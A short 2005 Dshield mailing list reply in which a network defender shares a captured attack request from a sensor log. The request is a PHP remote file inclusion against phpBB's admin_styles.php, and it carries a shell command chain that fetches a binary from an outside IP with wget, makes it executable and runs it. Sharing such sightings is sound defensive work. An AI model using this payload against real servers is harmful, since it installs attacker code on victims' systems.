[Dshield] PHP attacks (was Re:Destructive botnet originating from Japan]

Jeff Kell jeff-kell at utc.edu
Sat Dec 24 21:31:19 GMT 2005


Chris Brenton wrote:

>And the follow up that includes the point of infection. This was covered
>in the diary a few days ago.
>
Just spotted this on one of my sensors (obfuscated http: but otherwise 
verbatim):

>GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=h t t p://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1
>  
>
Jeff


More information about the list mailing list